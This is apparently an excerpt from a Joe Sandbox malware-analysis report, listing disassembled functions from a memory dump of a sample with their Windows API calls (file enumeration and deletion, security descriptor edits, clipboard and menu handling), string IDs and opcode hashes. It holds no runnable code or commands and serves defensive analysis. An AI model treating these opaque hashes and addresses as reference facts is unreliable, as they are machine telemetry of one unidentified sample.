                                                                                                                  • _wcscmp.LIBCMT ref: 00DC213A
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC214C
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00E23A68), ref: 00DC216A
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC2174
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC2181
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC2191
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                  • Opcode ID: f802dcce346ab428f2c52129ec6a7132f2e72d306ae91b3ebd28871cfab81bbf
                                                                                                                  • Instruction ID: 25f630f0aef2f530d83e5078dcee555e7a28755f9545ccbf22effa93931ac41c
                                                                                                                  • Opcode Fuzzy Hash: f802dcce346ab428f2c52129ec6a7132f2e72d306ae91b3ebd28871cfab81bbf
                                                                                                                  • Instruction Fuzzy Hash: 90317E71A0031A7ADF10ABA4EC49FFE77AD9F05360F18416AE915E3190DB74DA44CE74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00DDF14B
                                                                                                                    • Part of subcall function 00DDD5EE: ClientToScreen.USER32(?,?), ref: 00DDD617
                                                                                                                    • Part of subcall function 00DDD5EE: GetWindowRect.USER32(?,?), ref: 00DDD68D
                                                                                                                    • Part of subcall function 00DDD5EE: PtInRect.USER32(?,?,00DDEB2C), ref: 00DDD69D
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00DDF1B4
                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DDF1BF
                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DDF1E2
                                                                                                                  • _wcscat.LIBCMT ref: 00DDF212
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DDF229
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00DDF242
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00DDF259
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00DDF27B
                                                                                                                  • DragFinish.SHELL32(?), ref: 00DDF282
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00DDF36D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                  • Opcode ID: 412c6ddaa3787b5e079a182735932e63073fc2a37fa77aeaaf2adb5841f54d87
                                                                                                                  • Instruction ID: 5e68632e50207f27664343bf042384f3c985c2f5addc1bc88774afdb98e5b558
                                                                                                                  • Opcode Fuzzy Hash: 412c6ddaa3787b5e079a182735932e63073fc2a37fa77aeaaf2adb5841f54d87
                                                                                                                  • Instruction Fuzzy Hash: AE612871108304AFC711EF64DC85EABBBE9FF89710F104A1EF595A62A1DB709A05CB72
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00DC21C0
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC21D5
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC21EC
                                                                                                                    • Part of subcall function 00DB7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DB7621
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00DC221B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC2226
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00DC2242
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2269
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2280
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC2292
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00E23A68), ref: 00DC22B0
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC22BA
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC22C7
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC22D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                  • Opcode ID: fc569f6c8b4646a911f23395d8e5b2aecdbf3a95cdb37d1bce63cd983ad26bb3
                                                                                                                  • Instruction ID: e1f228c9afc602f7073f3c1d8a59ee48e63b155daf3a82ca68609ccd92c30c16
                                                                                                                  • Opcode Fuzzy Hash: fc569f6c8b4646a911f23395d8e5b2aecdbf3a95cdb37d1bce63cd983ad26bb3
                                                                                                                  • Instruction Fuzzy Hash: 5D31A03190131A7ADF10ABA4EC49FFEB7AD9F45320F284169E815E3190DB709A85CE78
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove_memset
                                                                                                                  • String ID: Q\E$[$\$\$\$]$^
                                                                                                                  • API String ID: 3555123492-286096704
                                                                                                                  • Opcode ID: 408b93c1d62aadf6ebe298ff11cd34ef2c6229268e4d11bcdff712ca40a026cd
                                                                                                                  • Instruction ID: ec2f4e7b5b6e96f1cc41e1fa5f8b348073ab9e2b4a7378025263a7512c59abb1
                                                                                                                  • Opcode Fuzzy Hash: 408b93c1d62aadf6ebe298ff11cd34ef2c6229268e4d11bcdff712ca40a026cd
                                                                                                                  • Instruction Fuzzy Hash: D4729C71D04219CBDB24CF98C9806BDBBB1FF44314F29C1A9D959AB281E774EE81DB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DDED0C
                                                                                                                  • GetFocus.USER32 ref: 00DDED1C
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00DDED27
                                                                                                                  • _memset.LIBCMT ref: 00DDEE52
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00DDEE7D
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00DDEE9D
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00DDEEB0
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00DDEEE4
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00DDEF2C
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DDEF64
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00DDEF99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                  • Opcode ID: 65412ce5428f882f2e617a8c5ed9cca4cfb37f92571d7a100595d3eb960c27bc
                                                                                                                  • Instruction ID: da7def4e623f0a606b4c1835447fd6b76b5d67fabb10a2769418d753d862b7f9
                                                                                                                  • Opcode Fuzzy Hash: 65412ce5428f882f2e617a8c5ed9cca4cfb37f92571d7a100595d3eb960c27bc
                                                                                                                  • Instruction Fuzzy Hash: 91815B71108311AFDB10EF25D884A6ABBE6FF88354F04492EF9999B391D730D905CBB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DAB903
                                                                                                                    • Part of subcall function 00DAB8E7: GetLastError.KERNEL32(?,00DAB3CB,?,?,?), ref: 00DAB90D
                                                                                                                    • Part of subcall function 00DAB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DAB3CB,?,?,?), ref: 00DAB91C
                                                                                                                    • Part of subcall function 00DAB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DAB3CB), ref: 00DAB923
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DAB93A
                                                                                                                    • Part of subcall function 00DAB982: GetProcessHeap.KERNEL32(00000008,00DAB3E1,00000000,00000000,?,00DAB3E1,?), ref: 00DAB98E
                                                                                                                    • Part of subcall function 00DAB982: RtlAllocateHeap.NTDLL(00000000,?,00DAB3E1), ref: 00DAB995
                                                                                                                    • Part of subcall function 00DAB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DAB3E1,?), ref: 00DAB9A6
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DAB3FC
                                                                                                                  • _memset.LIBCMT ref: 00DAB411
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DAB430
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB441
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00DAB47E
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DAB49A
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB4B7
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DAB4C6
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00DAB4CD
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DAB4EE
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00DAB4F5
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DAB526
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DAB54C
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DAB560
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: 1112a68e8fd0761508a2e6cd870c133a1cf493a32b902e65ea87c7f48a313079
                                                                                                                  • Instruction ID: a84a8ae37feb55f0e6dfc2e15ae56e415c0fe24c280dca1930c8763e032df824
                                                                                                                  • Opcode Fuzzy Hash: 1112a68e8fd0761508a2e6cd870c133a1cf493a32b902e65ea87c7f48a313079
                                                                                                                  • Instruction Fuzzy Hash: 99511A71900209AFDF00DFA4DC55AEEBB7AFF06314F18811AE915E6292DB359A06CF70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                    • Part of subcall function 00DB7C0C: GetFileAttributesW.KERNEL32(?,00DB6A7B), ref: 00DB7C0D
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6E7E
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DB6E99
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DB6EAE
                                                                                                                  • _wcscpy.LIBCMT ref: 00DB6EDD
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6EEF
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6F01
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00DB6F0E
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DB6F22
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DB6F3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2643075503-1173974218
                                                                                                                  • Opcode ID: b782cd2eadf08855ff5ce945010f9ac051f7c962c7457d041981fdea093161f4
                                                                                                                  • Instruction ID: 48265ac074b9ca7ede48ab71e1c01ddedf687a11421feb4cd9552db3a7992ad4
                                                                                                                  • Opcode Fuzzy Hash: b782cd2eadf08855ff5ce945010f9ac051f7c962c7457d041981fdea093161f4
                                                                                                                  • Instruction Fuzzy Hash: E821C172408344BEC711EBA0D8849EBBBDC9F59314F044A5AF5E5C3142EA34D60D8BB2
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1737998785-0
                                                                                                                  • Opcode ID: 3a58006b15b318394044522da0ba45cee8f4379d19b12e07630ef19316f89c19
                                                                                                                  • Instruction ID: f97791b20a3278ca9d0c15c74051df0c75bcdc805d0b848495a46e876d674afb
                                                                                                                  • Opcode Fuzzy Hash: 3a58006b15b318394044522da0ba45cee8f4379d19b12e07630ef19316f89c19
                                                                                                                  • Instruction Fuzzy Hash: 65217A31244216AFDB00AF24DC49F6DBBAAEF44720F048019F94ADB2A1DB70E900DFB4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DC24F6
                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DC2526
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC253A
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2555
                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DC25F3
                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DC2609
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                  • Opcode ID: 4c37181d34018c0377f017c0c53f2bd9168ec2bf62d0d595b2ff55c4f0889bca
                                                                                                                  • Instruction ID: dbff7134807da9891e1c86fd7f6fc8505ac64a6cf7e800350e6f5821d5c70585
                                                                                                                  • Opcode Fuzzy Hash: 4c37181d34018c0377f017c0c53f2bd9168ec2bf62d0d595b2ff55c4f0889bca
                                                                                                                  • Instruction Fuzzy Hash: 3941397194421AAFCF15DFA4CC59AEEBBB4FF05310F24445AE815A3291E7309A84CF70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                  • API String ID: 0-1546025612
                                                                                                                  • Opcode ID: 381d4c2d816a262a6237b0394845f9f53ddff9c3ea8b60412116eaaf9ac718c5
                                                                                                                  • Instruction ID: 99be5ff25a31c345f058f2147fb39aaecfbcef9d76ef0388725906ebb90a2fca
                                                                                                                  • Opcode Fuzzy Hash: 381d4c2d816a262a6237b0394845f9f53ddff9c3ea8b60412116eaaf9ac718c5
                                                                                                                  • Instruction Fuzzy Hash: CA92AC72E0021E8BDF24CF68C9547BDB7B1BB54314F19C1AAE959AB280E7709D91CF60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 115546eb06812fb56fad9eb4c5670826dfd9d2f47f6ebed42de17170980106fa
                                                                                                                  • Instruction ID: 227e40a7c1db52601d6bf73220a947fdb97ff5c484e5431aefbb02fb76ac2a0c
                                                                                                                  • Opcode Fuzzy Hash: 115546eb06812fb56fad9eb4c5670826dfd9d2f47f6ebed42de17170980106fa
                                                                                                                  • Instruction Fuzzy Hash: BA126C70A00609EFDF18DFA5D985AAEB7F5FF48300F248569E44AE7250EB35A911CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B736: GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                    • Part of subcall function 00D8B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  • ReleaseCapture.USER32 ref: 00DDEB1A
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00DDEBC2
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DDEBD5
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00DDECAE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
